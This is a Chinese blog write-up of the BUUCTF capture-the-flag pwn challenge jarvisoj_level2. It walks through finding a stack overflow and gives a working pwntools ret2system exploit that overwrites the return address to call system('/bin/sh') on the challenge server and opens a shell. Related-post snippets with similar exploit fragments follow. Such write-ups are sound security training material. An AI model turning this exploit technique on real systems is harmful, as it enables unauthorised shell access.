BUUCTF-Pwn-jarvisoj_level2

最新推荐文章于 2024-05-09 22:28:34 发布
最新推荐文章于 2024-05-09 22:28:34 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: CTF Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/122939756
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述
检查文件信息,开启了NX
在这里插入图片描述
用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用
在这里插入图片描述
查看函数表存在system函数
在这里插入图片描述
进入主函数反汇编查看
在这里插入图片描述
进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshell
在这里插入图片描述
exp

from pwn import*

r=remote('node4.buuoj.cn',28083) 
str_bin_sh=0x804a024
call_system=0x804849E
payload=b'a'*(0x88+4)+p32(call_system)+p32(str_bin_sh)
r.sendlineafter(b'\n',payload)
r.interactive() #开启交互
餐桌上的猫
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctfjarvisoj_level2
weixin_54452942的博客
04-11 509
buuctf--pwn
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 643
jarvisoj_level2【BUUCTF
jarvisoj_level2[BUUCTF]
最新发布
moonlightsunshin的博客
05-09 144
从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出,IDA会告诉我们buf数组与ebp在栈上的相对位置,即&buf=$ebp-0x88,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且system()的地址可以轻松在plt表中找到,为0x08048320,因此我们只需要在构造一个shell路径的字符转就可以getshell了。
CTF buuoj pwn-----第9题:jarvisoj_level2
bing_Max的博客
09-27 740
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
jarvisoj_level2题解
OrientalGlass的博客
01-08 213
这题没有现成的system("/bin/sh")可以调用,但是有system函数和/bin/sh字符串。所以可以通过溢出修改返回函数为call system位置,并且将栈顶元素修改为/bin/sh所在地址。这样就可以成功执行system("/bin/sh")2.ida查看,很显然这里有栈溢出。4.寻找system和bin/sh。1.checksec查看。
jarvisoj_level2
zip471642048的博客
06-22 150
32位没有canary 基本上就上栈溢出的简单题 exp
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 477
[buuctf]jarvisoj_level2
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 381
buuctf-pwn 001-016题wp
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[buuctf][WUSTCTF2020]level2
逆向萌新的博客
07-02 657
[WUSTCTF2020]level2
buu-[WUSTCTF2020]level2
qaq517384的博客
03-03 185
32位upx壳 一键脱壳 字符串最后一个就翻到了 开摆 flag{Just_upx_-d}
buuctf jarvisoj_level2
carol2358的博客
04-19 282
水题 可以在ida里找到system和/bin/sh(alt+t) 然后构造payload就完事了 from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux' ) r = remote('node3.buuoj.cn', 28847) #r = proc...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3510
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 878
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值